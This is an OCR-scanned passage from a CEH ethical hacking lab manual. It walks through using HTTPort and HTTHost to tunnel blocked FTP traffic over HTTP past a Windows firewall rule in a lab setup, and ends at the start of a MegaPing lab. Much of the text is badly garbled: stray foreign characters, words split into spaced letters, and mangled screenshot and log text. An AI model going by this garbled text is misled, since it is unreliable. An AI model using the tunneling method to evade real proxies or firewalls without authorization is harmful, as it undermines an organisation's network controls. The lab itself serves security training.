% 1Vrd>/.9 AudO Mo'eOcS a...C«so1 a ion:(V»1׳d f1 Web an w־ r< rr end » :דדלמי׳ו־כ0ח rry .y ■ f c ־: rr״ r lnforrr~-.cn 5e ra * -Hjrage ־
^ «v׳xto/.9 Aucto ErekJrtit s J s e ^ 1Y־־<to/.S Cotor SySteri
Ha'sOeid... he W־ aPl..
£(Mfld0M Dectoymeot Sevces Serve Ha-aoesr... ^ M m s Driver Fourdaoon - Lee ״cce Diver “ ־ * ׳ xr- Ha־׳aoe; u...& s./׳d3־־Y» ..־■״1 ׳0׳ Repo8׳ יט Semoe i^%Yrd»/.9 ? e׳ i: Cotecto % \V'tkr/.$ ®׳e it uw ^!Yrdo/.s F»e.\dl
Ab1־.-sero...Thssevfc...Thssevfc...ViWowsF..
Ste tec
Stated . Stated
$*Yrd>/.e CngUi/ler I aat Adds, mod■.״CJt«Yrtto/.9 1 1 ו׳5י׳»יו״» קמי׳ ftovd» a ... Stated
«v־׳d0/9 ModJes trwtalei & »ab«n s... StatedCi«v׳xto/.® BioceM Activation Seivd I ^ r ...Undo •יזל Stated^ ■V'cto/n 5«mote M3׳V0e״«*nt M Re*»t V J« o ״ »B... Stated
tr ya it m *■ »
Mints׳* S.. . stated^ %Y׳Yfew,« uoflat* stated^ *v rH n p webP'oxvAuto-oaeovJ ^ . v Autocar *c ->«׳
Perfcrwsrce Aflao*׳
KrHTTPl...
H n y r B f i^***TMC... Pre ־0*6 0 ״
taecr׳'<08'\• bet) StatedJE3 S JB
\£ x ard e; A Sarri8•: /' ;n־?o'c y-1:c • ■er: -vb1,'־. g;'׳ c -T:־£ r c׳ t.:• r: ;0 ^ ־־0־
& It bypasses HTTPS and HTTP proxies, transparent accelerators, and firew a lls . It has a built-in SOCKS4 server.
F IG U R E 1 4 2 : Sto p p in g W o rld W id e W e b Services in W in d o w s Se rve r 2008
O p e n M a p p e d N e t w o r k D r i v e “ CEH-Tools" Z:\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTHost
O p e n HTTHost f o l d e r a n d d o u b le c l i c k htthost.exe.
T l i e HTTHost w iz a r d w i l l o p e n ; s e le c t d ie Options ta b .
O n d ie Options ta b , s e t a l l d i e s e t t in g s t o d e f a u l t e x c e p t Personal Password fie ld, w h i c h s h o u ld b e f i l l e d i n w i t h a n y o t h e r p a s s w o r d . 111 d i i s
la b , d i e p e r s o n a l p a s s w o r d is km agic.'?
ט It supports 4 .
strong tra fficencryption, w h ich 5 .makes proxylogging useless, 6.
and supports7 .
NTLM and o therau thentica tionschemes.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 223
M odule 03 - S can n in g N e tw o rk s
8. C h e c k d ie Revalidate DNS names a n d Log Connections o p t i o n s a n d c l i c k
Apply
HTTHost 1.8.5
Netw ork
Bind e x te rn a l to :
10.0.0.0P ort:
[80
P e rs o n a l p a ssw o rd :
Bind l is te n in g to :
|0.0.0.0Allow a c c e s s fro m :
10.0.0.0
־] P a s s th r o u g h u n re c o g n iz e d r e q u e s t s to :
H o st n a m e o r IP : P o rt: O rig ina l IP h e a d e r fie ld :
| x O־ rig in a l־ IP|81
T im e o u ts :
1127.0.0.1
M ax. local b u ffe r :
־3 |0=1־2
ApplyR ev a lid a te DNS n a m e s
Log c o n n e c tio n s ־
S ta tis tic s ] A pplica tion log |^ 3 p tio n s jj" S e c u r'ty | S e n d a G ift)
F IG U R E 14.3: H T T H o s t O p tio n s tab
9 . N o w le a v e HTTHost i n t a c t , a n d d o n ’ t t u r n o f f W indows Server 2008 V i r t u a l M a c h in e .
1 0 . N o w s w i t c h t o Windows Server 2012 Host Machine, a n d in s t a l l H T T P o r t
f i o m D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort a n d d o u b le - c l i c k httport3snfm .exe
1 1 . F o l l o w d ie w i z a r d - d r iv e n insta lla tion steps.
1 2 . L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r i n t h e l o w e r - l e f t
c o r n e r o f t h e d e s k t o p .
F IG U R E 14.4: W in d o w s Se rve r 2012 - D esk to p ^ iew
1 3 . C l i c k d ie HTTPort 3.SNFM a p p t o o p e n d ie HTTPort 3.SNFM w in d o w .
& To se t up HTTPort need to po in t your brow ser to 127.0.0.1
& HTTPort goes w ith the predefined mapping "External HTTP proxy״ o f local port
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 224
M odule 03 - S can n in g N e tw o rk s
5 t3 ft Administrator
ServerManager
Windows Power Shell
GoogleChrome
Hyper-VManager
HTTPort3.SNPM
i . m » 91 1
Con>puter
נ*
ControlPanel
V
Wyper-VVirtualMachine...
SOI Server incaknor Cent•!.״
n
£CommandPrompt
M021IUFirefox Nctwodc
■״״ ■“-ייF־־־ © if
ProxyWorkbea.
MegaPng
- T *8
Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
F IG U R E 14.5: W in d o w s Se rve r 2012 - A p p s
14 . T h e HTTPort 3.SNFM w i n d o w a p p e a r s as s h o w n i n d ie f ig u r e d ia t f o l lo w s .
F o r e ach so ftw a re to crea te cu sto m , g ive n a ll th e ad d resses fro m w h ic h it o p erates. F o r ap p lica tio n s th a t are d yn am ica lly ch an g in g th e p o rts th e re S o ck s 4-p roxy m o d e, in w h ich th e so ftw a re w ill crea te a lo c a l se rve r So cks (127 .0 .0 .1 )
־' r°HTTPort 3.SNFMS ystem j Proxy :j por m app ing | A bout | R eg iste r |
HTTP proxy to b y p a ss (b lan k = direct or firewall)
H ost n a m e or IP a d d re ss : Port:
Proxy req u ires au then tica tion U se rn am e : Passw ord!
B ypass m o d e :
Misc. op tions
U ser-A gent:
IE 6 .0
U se p e rso n al re m o te h o s t a t (b lan k = u s e public)
H ost n a m e or IP a d d re ss : Port: Passw ord:
I------------------------------ P I--------------
Start? \ 4—This bu tton helps
F IG U R E 14.6: H T T P o rt M a in W in d o w
1 5 . S e le c t d ie Proxy ta b a n d e n te r d ie host name o r IP address o f t a r g e te d
m a c h in e .
1 6 . H e r e as a n e x a m p le : e n t e r W indows Server 2008 v i r t u a l m a c h in e IP address, a n d e n te r Port number 80
1 7 . Y o n c a n n o t s e t d ie Username a n d Password f ie ld s .
18 . 111 d ie User personal remote host a t s e c t io n , c l i c k sta rt and d ie n stop a n d
d ie n e n t e r d ie t a r g e te d Host machine IP address a n d p o r t , w h i c h s h o u ld
b e 8 0 .
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 225
M odule 03 - S can n in g N e tw o rk s
19 . H e r e a n y p a s s w o r d c o u ld b e u s e d . H e r e a s a n e x a m p le : E n t e r d ie p a s s w o r d
as ‘*magic״In real w orld environm ent, people som etim es use password pro tected proxy to make com pany employees to access the Internet.
2 0 . S e le c t d ie Port Mapping ta b a n d c l i c k Add t o c re a te New Mapping
Q H T T H o s t su p p o rts th e re g is tra tio n , b u t it is free an d p assw o rd - free - yo u w ill b e issu ed a u n iq u e ID , w h ich yo u can co n ta c t th e su p p o rt team and ask yo u r q u estion s.
2 1 . S e le c t New Mapping Node, a n d r i g h t - c l i c k New Mapping, a n d c l i c k Edit
1 - 1 °HTTPort 3.SNFM*בA bout | R eg iste r JPort m appingS y stem | Proxy
Static T C P/IP port m ap p in g s (tu n n e ls)
1םייים1
LEDs:
□□□םO Proxy
Q New m apping Q Local port
1-0(3 R em o te h o st
— re m o te , h o st, n a m e□ R em o te port
1_0
Select a m app ing to s e e sta tistics :
No s ta ts - se le c t a m app ingn /a x n /a B /sec n /a K
Built-in SOCKS4 server
W Run SOCKS se rv e r (po rt 1080)
A vailable in "R em ote Host" m o d e : r Full SOCKS4 su p p o rt (BIND)
? | 4— This b u tton helps
F IG U R E 14.8: H T T P o rt creating a N e w M ap p in g
r|a HTTPort3.SNFM | 3 ' ־ xS ystem Proxy | p 0 rt m ap p in g | A bout | R eg iste r |
HTTP proxy to b y p a ss (b lan k = direct or firewall)
Host n a m e or IP a d d re ss : Port:| 10 .0 .0 .4 |80
Proxy req u ires au th en tica tio n U se rn am e : Passw ord:
Misc. op tions
U ser-A gent: B ypass m o d e :| IE 6 .0 | R em o te h o s t
U se p e rso n al re m o te h o s t a t (b la n k * u s e public)
Host n a m e or IP a d d re ss : *ort: P assv » rd :|1 0 .0 .0 .4 I80 |............1
? | <—This b u tton h e lp s S tart
F IG U R E 14.7: H T T P o rt P ro x v settings \rin d o w
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 226
M odule 03 - S can n in g N e tw o rk s
T3 3HTTPort 3.SNFMS y stem | Proxy m app ing | A bout | R eg iste r |
Static T C P/IP port m a p p in g s (tu n n e ls )
Add
R em ove
New m ao□ Local p
0 ■Editש
LEDs:
□ □□□ O Proxy
0 R em o te h o stre m o te , h o st, n a m e
(=J R em o te portL_o
Select a m app ing to s e e sta tistics :
No s ta ts - s e le c t a m app ing n /a x n /a B /sec n /a K
Built-in SOCKS4 serv er
W Run SOCKS serv er (po rt 1080)
A vailable in "R em o te Host" m o d e : r Full SOCKS4 su p p o rt (BIND)
? | 4 — This b u tton he lps
F IG U R E 14.9: H T T P o rt E d itin g to assign a m apping
2 2 . R e n a m e t h is t o ftp ce rtified hacker, a n d s e le c t Local port node; t h e n l i g h t -
c l i c k Edit a n d e n t e r P o r t v a lu e t o 21
2 3 . N o w r i g h t c l i c k o n Remote host node t o Edit a n d r e n a m e i t as
ftp .certifiedhacker.com
2 4 . N o w r i g h t c l i c k o n Remote port n o d e t o Edit a n d e n te r d ie p o r t v a lu e t o 21
r *1 HTTPort 3.SNFM - 1 ° r x •
1 S y stem | Proxy Port m app ing | A bout | R eg iste r |
r Static T C P/IP port m ap p in g s (tu n n e ls )
1=1 - .=•׳•.• /s Add0 Local port ־
5 -2 1 R em ove0 R em o te h o st
ftp .certifiedhacker.comR em o te port =
I— 21V
S elect a m app ing to s e e s ta tis tic s : LEDs:
No s ta ts - inactive ם □ □ □n /a x n /a B /sec n /a K O Proxy
1dulit־in serverW Run SOCKS serv er (po rt 1080)
A vailable in "R em o te Host" m o d e :I” Full SOCKS4 su p p o rt (BIND)
J ? | This b u tton he lps
F IG U R E 14.10: H IT P o r t S tatic T C P / IP p o rt m apping
2 5 . C l i c k Start o n d ie Proxy ta b o f H T T P o r t t o m i l d ie H T T P t u n n e l in g .
Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
S In th is kind o f environm ent, the federated search w ebpart of M icrosoft Search Server 2008 w ill not w o rk out-of- the-box because w e only support non-password pro tected proxy.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 227
M odule 03 - S can n in g N e tw o rk s
r־ a :HTTPort 3.SNFMS y stem ^ oxy | Port m ap p in g | A bout | R eg iste r |
- HTTP proxy to b y p ass (b lan k = direct or firewall)
H ost n a m e or IP a d d re ss : Port:|1 0 .0 .0 .4 [80
Proxy req u ire s au th en tica tio n U se rn am e : Passw ord:
B ypass m o d e :
ד נ [ R em o te h o s t
Misc. op tions
U ser-A gent:
IE 6 .0
U se p e rso n al re m o te h o s t a t (b lan k = u s e public)
H ost n a m e or IP a d d re ss : Port: Passw ord:|10.0.0.4 [So ״***ן*
? | ^— This b u tto n he lp s
F IG U R E 14.11: H T T P o rt to start tunneling
2 6 . N o w s w i t c h t o d ie W indows Server 2008 v i r t u a l m a c h in e a n d c l i c k d ie
Applica tions log ta b .
2 7 . C h e c k d ie la s t l i n e i f L is te n e r lis ten ing a t 0.0.0.0:80, a n d d i e n i t is m i m i n g
p r o p e r ly .
( J3 H T T P is th e basis fo r W e b su rfin g , so i f yo u can fre e ly s u rf th e W e b fro m w h e re yo u axe, H T T P o r t w ill b rin g yo u th e re s t o f th e In te rn e t ap p lica tio n s .
HTTHost 1 A 5
A p p lic a t io n lo g :
M A IN : H T T H O S T 1 .8 .5 PERSONAL G IF T W ARE DEMO s t a r t i n g ^M A IN : P ro je c t c o d e n a m e : 9 9 re d b a llo o n sM A IN : W r it te n b y D m it ry D v o in ik o vM A IN : (c ) 1 9 9 9 -2 0 0 4 , D m it ry D v o in ik o vM A IN : 6 4 t o t a l a v a ila b le c o n n e c t io n (s )M A IN : n e tv /o rk s ta r te d M A IN : RSA k e y s in i t ia l iz e d M A IN : lo a d in g s e c u r ity f i l t e r s . . .M A IN : lo a d e d f i l t e r " g r a n t . d l l " (a llo w s a ll M A IN : lo a d e d f i l t e r " b lo c k .d l l " ( d e n ie s al M A IN : d o n e , to ta l 2 f i l t e r ( s ) lo a d e dM A IN : u s in g t r a n s fe r e n c o d in g : P r im e S c ra m b le r6 4 /S e v e n T e g r a n t .d l l : f i l te r s c o n e c tio n s b lo c k .d l l : f i l te r s c o n e c tio n s
!L IS TE N E R : l is te n in g a t C.C.0.C:sT|
c o n n e c t io n s w ith in I c o n n e c t io n s w ith ir
z ]O p t io n s S e c u r ity | S e n d a G ift( Application logS ta tis t ic s
Q T o m ake a d ata tu n n e l th ro u g h th e p assw o rd p ro te c te d p ro x y , so w e can m ap ex te rn a l w e b s ite to lo c a l p o rt, an d fed e ra te th e search re su lt.
F IG U R E 14.12 H T T H o s t A p p lica tio n log section
2 8 . N o w s w i t c h t o d ie W indows Server 2012 h o s t m a c h in e a n d t u r n ON d ie
W indows Firewall
2 9 . G o t o W in d o w s F i r e w a l l w i t h Advanced Security
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 228
M odule 03 - S can n in g N e tw o rk s
3 0 . S e le c t Outbound rules f r o m d ie l e f t p a n e o f d ie w i n d o w , a n d d ie n c l i c k
New Rule i n d ie r i g h t p a n e o f d ie w in d o w .
Windows Firewall v/ith Advanced Security־°:-■ - ־
Fie Action View Help
Outbound Rule*New Rule...
V Filter by Profile
V Filter by State 7 Filter by Group
View O Refresh
Export List...Q Help
Outbound RuinName Group Profile tnatfed A©B'anchCache Content R«t1i«val (HTTP.O... BranchCache- Content Retr... A l No© BranchC ache Horted Ca<t* Cbent IHTT... BranchCache - Hosted Cech - Al No©BranchCache Hosted Cache Se»ve1(HTTP. BranchCache - Hosted Cadi. Al No©BranchC ache Peer Dncovery (WSDOut) BranchCache - PeerOtscove... Al No© Co׳e Networking • DNS <U0P-0ut) Core Networking Al Vet ■©Core Networking- D>1v>m-e Config... Core Networking Al Yes©Core Networking ־ Dynamic Host Config... Core Networking Al rei©CoreNetworkng ־ Grcup Policy (ISA5S־~ Core Networking Deane■! Ves©Core Networking - 5׳cup Poky (NP-Out) Core Networking Domain Yes©CoreNetworkeig - Group Policy CTCP-O-. Core Networking Dcm5»1 Yes©Core Networking - Internet Group Man a... Core Networking Al Yes©Core Networking ־ IPHT7PS (TCP-Out] Core Networking Al Yes©Core Networking- IP v ffM C u l) Core Networking Al Ves©Core Networkng ־ Mulbcost listener Do-. Core Networking Al Ves©Core Networking - Mulocast Listener Qu~ Core Networking Al Yes©Core Network*!g - Mufceost listener Rep~ Core Networking Al Ves©Core Networking • Mutecjst Listener Rep... Core Networking Al Yec©Core Networking - Neighbor Dncovery A... Core Networking Al Ves©Core Networking *fc1(j־׳oo׳ Ceccvery S... Core Networking Al Ves©Core Network rig .-Packet loo Big (ICMP ־ Core Networking Al Ves©Core Networking Par3meterProblem (1- Core Networking Al Ves©Core Networking - ficutet Advertnement... Care Networking Al Vet©Core Networking - P.cuur Soictaeon (1C.. Core Networking Al Yes©Core Networkng - Itirdo iLOP-Outl Core Networking Al Vet
v '"■i T r" ....... -ז
Windows F ircw.511 with Adv! Q Inbound Ruin
■ Outbound Rules |Connection Security Ru
^ •ן Monitoring
F IG U R E 14.13: W in d o w 's F ire w a ll w ith A d van ced Secu n ty w in d o w in W in d o w s Se rve r 2008
3 1 . 111 d ie New Outbound Rule Wizard, s e le c t d ie Port o p t i o n i n d ie Rule Types e c t io n a n d c l i c k Next
pNew O utbound Rule Wizard ■
R u le Type
Select the type cf firewall rule to create
Steps.
■j Rule Type What :ype d rue wodd you like to create?
w Protocol and Ports
« Action O Program
« Profle Rde Bidt controls connections for a program.
« flame | Port <§יRJe W controls connexions for a TCP or UDP W .
O Predefined:
| BranrhCacne - Content Retrieval (Ueee HTTP) v 1RUe t a controls connections for a Windows experience
O CustomCu3tomrJe
< Beck Next > 11 Cancel
F IG U R E 14.14: W in d o w s F ire w a ll selecting a R u le T yp e
£ Tools זdem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
S Tools dem onstrated in th is lab are available in Z:\ Mapped Network Drive in V irtual Machines
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 229
3 2 . N o w s e le c t All rem ote ports i n d ie Protocol and Ports s e c t io n , a n d c l i c k
Next
M odule 03 - S can n in g N e tw o rk s
New Outbound Rule Wizard
Protocol and Porta
Specify the protocols and ports to which ths r ie apofes
Does t־*s rule aopf/to TCP or UDP?<!•> TCP O UDP
Does tnis nie aoply tc all remote ports or specific renote port*9
! ? m o te p o d s
O Specific remote ports:Example 80.443.5000-5010
CancelNed >< Eacx
Steps
+ Ru• 'yp•
4 Prctocol and Ports 4 Acaor
4 Profile 4 Name
Q H T T P o r t d o e sn 't re a lly ca re fo r th e p ro x y as su ch , it w o rk s p e rfe c tly w ith fire w a lls , tra n sp a ren t a cce le ra to rs , N A T s and b a s ica lly a n y th in g th a t le ts H T T P p ro to co l th ro u g h .
F IG U R E 14.15: W in d o w s F ire w a ll assigning P ro to co ls and Po rts
3 3 . 111 d ie Action s e c t io n , s e le c t d ie Block the connection '’ o p t i o n a n d c l i c k
Next
New O utbound Rule Wizard
ActionSpecify the acton to be taken when ס connect!:>n notches the condticno specified in the n ie .
Steps:4 HUe Type What acbon ohodd b« taken whon a connexion match08 tho opochod conoticno7
4 Protocol and Porta O Alow ttv connectionTho nclxJes cornoctiona that 0סו piotectod wth IPaoc 09 wel cs t103׳c otc not.
O Alow I tic cwviediui If M Is secuieThs ncbdes only conredions that have been authent1:ated by usng IPsec. Comecticns wil be secued using the settngs in IPsec p־op5rtes and nJes r the Correction Security RuteTode.
4 Action
4 Profile
4 Name
Q You need to install htthost on a PC, who is generally accessible on the Internet - typically your "home" PC. This means that if yon started a Webserver on the home PC, everyone else must be able to connect to it. There are two showstoppers for htthost on home PCs
' • ) H o c k t h e c o n n e c t io n
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 230
M odule 03 - S can n in g N e tw o rk s
F IG U R E 14.16: Windows Firewall setting an Action
3 4 . 111 d ie Profile s e c t io n , s e le c t a l l t h r e e o p t io n s . T h e r u le w i l l a p p ly t o :
Domain, Public. Private a n d d i e n c l i c k Next
*New O utbound Rule Wizard
ProfileSpecify the prof les for which this rule applies
When does #מו rule apply7
171 Daman
Vpfces *I en a computer is connected to Is corporate doman.
0 Private3ppies wt en a computer is connected to a pivate oetwak bcabcn. such as a home orworcpi ce
B PublicVp*״c3 0ד a ccmputcr io cconcctcd to a pjblc nctwoiK kcooon
CancelNext >c Eacx
Skin* Ru*Typ#
4 3rctocol anc Ports# *cbor
3rcfile
Q NAT/firewall issues: You need to enable an incom ing port. For HTThost it w ill typ ica lly be 80(http) or 443(https), but any port can be used - IF the HTTP proxy a t w ork supports it ־ some proxys are configured to a llow only 80 and 443.
F IG U R E 14.17: W in d o w s F ire w a ll P ro file settings
3 5 . T y p e Port 21 Blocked i n d ie Name f i e ld , a n d c l i c k Finish
New O utbound Rule Wizard
N am e
S06dfy the rams and desorption of this lie.
None|?or. 2 ' B b d c e J
Desaiption (optional):
CancelFinish< Back
ZZy Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
£ 3 T h e d e fa u lt T C P p o rt fo r F T P co n n e c tio n is p o rt 21. So m etim es th e lo c a l In te rn e t S e rv ic e P ro v id e r b lo ck s th is p o rt an d th is w ill re su lt in F T P
Eth ica l Hacking and Countermeasures Copyright C by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C®W<EAfl*1MaW&al Page 231
M odule 03 - S can n in g N e tw o rk s
F IG U R E 14.18: W in d o w s F ire w a ll assigning a nam e to Poet
3 6 . T h e n e w m le Port 21 Blocked is c r e a te d as s h o w n i n d ie f o l l o w i n g f ig u r e .
1-1“ 1 * :Windows Firewall with Advanced Security
Fie Action View Hdp
Actions
Outbound RulesNew Rule...
V Filter by Profit•V F liter by Stirte
V Filter by Group
View
(Oj Refresh [a» Export List...
L i Help
Port 21 Blocked* Disable Rule
4 cut Gfe Copy
X D«l«t«
(£| Propeitie*
U Help
Al:1AlAlAlAlAlDomainDomainDomain
AlAlA lAlAlAlAlAlAlA lAlAlAl
BranchCache • Content Retr..Branch( at hr • Hotted ( ac hBranchCach• • HuiteJCachBranchCache • Peer Discove..Core NetworkingCore NetworkingCore NetworkingCore NetworkingCore NetworkingCore NetworkingCore NetworkingCote NetworkingCore NetworkingCore NetworkingCore NetworkingCore NetworkingCor• NetworkingCore NetworkingCore NetworkingCortNttwQiking Core Networking Core Networking Core Networking
Na[O^Port 21 Blocked©BranchCache Content Rctrcvtl (HTTP-0.. ^ Branch(a 1 he Hotted Cache Client (H it . 0 BianchCach* Hosted Cache $erv*1(HTTP... ©BranchCache Peer Cn<o.er/ //SD Cut) ©Core Networking ־ DNS(UDP-OutJ © Coir Networking- Dynamic Hod Config.. ©Core Networking - Dynamic Host Corvfig... ©Core Networking - Group Pcfccy CLSASS-- @PCore Netwoit'ing - Grcup PcEcy (fJP-Out) ©Core Networking - Group Poicy (TCP-O-. ©Core Networking - internet Group Mana... ©Core Ndwwiing- lPHTTPS(TCP-OutJ ©Core Networking - (Pw6-0ut)©Core Networking Listener Do״©Core Networking Muh < yt* listener O j״. ©Cote Networking - Mul!< aU Iktenet Rep. ©Cor« Networking • Vuh cast .!s:«n«r Rep. ©Core Networking rfcignfccf Discovery A... © Cor. 1 NetmD1tmg ־ Meaghbct Discoveiy 5 , © C 016 Nstworking - Pe.ktlTv. Big KM P.. ©Core Networking - Parameter Protolem (I.. ©Core Networking ־ Router A<hert1sement... ©Core Networking - Router SoKckation (1C...
Windows Firewall with Adv; C nfcound Rules C Outbound Rules
Connection SecuntyRul t Monitoring
F IG U R E 14.19: W in d o w s F ire w a ll N e w ru le
3 7 . R ig h t - c l i c k d ie n e w ly c r e a te d r u le a n d s e le c t Properties
Windows Firewall with Advanced Security*File Action View Hdp
* ^ ►י q !I Actions
Outbound Rules -New Rule...
V Filter by Profile ►V Filter by State ►V F liter by Group ►
Vi*w jO! Refresh ^ Export Litt... Q Help
►
Port 21 Blocked -♦ Disable Rule
4 c״t•41 CopyX Delete
Properties0 Help
Group * Profie Ervsl
Disable RaleBra nc hCac he ־ CorBranchCache - Hos Cut
BranchCache ־ Ho: Copy
BranchCache - Pee Core Networking Lore Networking
Delete
Properties
HdpCore NetworkingCore Networking Dom*n YetCore Networking Dom»n VesCore Networking Dom»n YesCore Networking Al YetCore Networking Al YesCore Networking Al YesCore Networking Al YesCore Networking Al YesCore Networking Al YesCore Networking Al YesCore Networking Al YesCore Networking Al YesCore Networking Al Yb
Core Networking Al YesCore Networking Al YCSCore Networkingr ... n -.-----11—
Al Yes
NameO.P01t21 Blocked^BranchCache Content Retrieval (HTTP-O״. ©BranchCache Hosted Cache Ciem(HTT״. ©BranchCache Hosted Cechc Saver(HTTP_ ©BranchCache Peet Disccvay (WSD-Ckjt) ©Cote Networbng - Df5 (U0P-0ut) ©Core Networking D>rwm : Host Ccnfig. ©Core Networbng • D>neo>c Most Config... ©Cote Networbng • Group Policy (ISASS-... ©Core Networking Group Policy (NP-Out) ©Core Networbng Group PolKy(TCP-0.- ©Core Networbng • Internet Group kbiu.. ©Core Networbng IPHTTPS(TCP-0ut) ©Core Networbng - IPv6 (1P»־$׳<XjtJ © Coie Netwoibng - Mufticsst Listener Do... ©Core Networbng - Multicast Listener Qu... ©CoreNerwcrbng - MJbcsst Listener Rep... ©Cote Netwoibng - Mulbcest Listener Rep...©Core Networbng - Neighbor Discovery A״. ©Core Networbng Neighbor Discovery S... I^Ccie Netwoibng ■ Packet Too Big (ICMP... ©Cote Networbng • Parameter Problem (1-״ ©Core Networbng Reuter Atf trtscment.- ©Core Netwoibng * Rcotei Sol*׳tation (1C~
gf Windows Firewall with Adv; f t inbound Rules O Outbound RulesConnection Security Rul
X/ Monitoring
the properties dialog box foi the tuner it le»un
F IG U R E 14.20: W in d o w s F ire w a ll new ru le properties
3 8 . S e le c t d ie Protocols and Ports ta b . C h a n g e d ie Remote Port o p t i o n t o
Specific Ports a n d e n t e r d ie Port num ber as 21
3 9 . L e a v e d ie o t h e r s e t t in g s a s d i e i r d e fa u l t s a n d c l i c k Apply d ie n c l i c k OK.
^ H T T P o r t d o e sn 't re a lly ca re fo r th e p ro x y as su ch : it w o rk s p e rfe c tly w ith fire w a lls , tra n sp a ren t a cce le ra to rs , N A T s an d b a s ica lly an y th in g th a t le ts th e H T T P p ro to co l th ro u g h .
S H T T P o r t th en in te rce p ts th a t co n n e c tio n an d ru n s it th ro u g h a tu n n e l th ro u g h th e p ro x y.
£ 7 E n a b le s y o u to b ypass y o u r H T T P p ro x y in case it b lo ck s yo u fro m th e In te rn e t
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 232
M odule 03 - S can n in g N e tw o rk s
i— ‘ W ith H T T P o r t , yo u can use va rio u s In te rn e t so ftw a re fro m b e h in d th e p ro x y , e .g ., e-m ail, in s ta n t m essengers, P 2 P file sh arin g , IC Q , N e w s , F T P , IR C e tc. T h e b asic id ea is th a t yo u set u p yo u r In te rn e t so ftw a re
4 0 . T y p e ftp ftp .certifiedhacker.com i n t h e c o m m a n d p r o m p t a n d p r e s s
Enter. T h e c o n n e c t i o n is b lo c k e d i n W indows Server 2008 by firew a ll
Port 21 Blocked Properties*ד
jerteral_________Pngams and Services Remote ConpjiefsProtocolt and Fore | Scope | Advancec j Local Princpab
All Potto
Exampb. 80. 443.5003-5010
FVwocob and po*s
Prctocdtype:
Prctocd runber
Loco port
Specife PatsRemote port
[21Example. 80. 443.5003-5010
I Custonizo.hten־et Gortnd Message Protocol (CMP)«ting*:
F IG U R E 14.21: F ire w a ll P o rt 21 B lo ck ed Pro p erties
£ 3 H T T P o r t d oes n e ith e r freeze n o r hang . W h a t yo u are ex p e rien c in g is k n o w n as ״b lo ck in g o p e ra tio n s ”
F IG U R E 14.22: ftp co n n ection is b locked
4 1 . N o w o p e n d ie c o m m a n d p r o m p t 0 11 d i e W indows Server 2012 h o s t
m a c h in e a n d t y p e ftp 127.0.0.1 a n d p r e s s Enter
7 ^ H T T P o r t m akes it p o ss ib le to o p e n a c lie n t sid e o f a T C P / IP co n n e c tio n and p ro v id e it to an y so ftw are . T h e ke yw o rd s h e re are : "c lie n t" an d "a n y so ftw a re ".
C E H Lab M anual Page 233 Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
F IG U R E 14.23: Ex ecu tin g ftp com m and
L a b A n a l y s i s
D o c u m e n t a l l d i e I P a d d re s s e s , o p e n p o r t s a n d r u n n i n g a p p l ic a t io n s , a n d p r o t o c o ls
y o u d is c o v e r e d d u r i n g d ie la b .
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
H T T P o r t
P r o x y s e r v e r U s e d : 1 0 .0 .0 .4
P o r t s c a n n e d : 8 0
R e s u l t : f t p 1 2 7 .0 .0 .1 c o n n e c t e d t o 1 2 7 .0 .0 .1
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .
Q u e s t i o n s
1. H o w d o y o u s e t u p a n H T T P o r t t o u s e a n e m a i l c l i e n t ( O u d o o k ,
M e s s e n g e r , e tc . )?
2 . E x a m in e i f s o f t w a r e d o e s n o t a l l o w e d i t in g d ie a d d re s s t o c o n n e c t t o .
I n t e r n e t C o n n e c t i o n R e q u i r e d
e s0 Y
P l a t f o r m S u p p o r t e d
0 C l a s s r o o m
□ N o
□ iL a b s
C E H Lab M anual Page 234 Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
B asic N etw ork Troubleshooting Using M egaPingMegaPing is an ultimate toolkit thatprovides complete essential utilities for information system administrators and I T solution providers.
i c o n k e y L a b S c e n a r i o
Y o u h a v e l e a r n e d i n t h e p r e v i o u s l a b t h a t H T T P t u n n e l i n g is a t e c h n i q u e w h e r e
c o m m u n i c a t i o n s w i t h i n n e t w o r k p r o t o c o l s a r e c a p t u r e d u s in g t h e H T T P
p r o t o c o l . F o r a n y c o m p a n ie s t o e x i s t 0 11 t h e I n t e r n e t , t h e y r e q u i r e a w e b s e r v e r .
T h e s e w e b s e r v e r s p r o v e t o b e a h i g h d a ta v a lu e t a r g e t f o r a t t a c k e r s . T h e
a t t a c k e r u s u a l l y e x p lo i t s d i e W W W s e r v e r r u n n i n g I I S a n d g a in s c o m m a n d l i n e
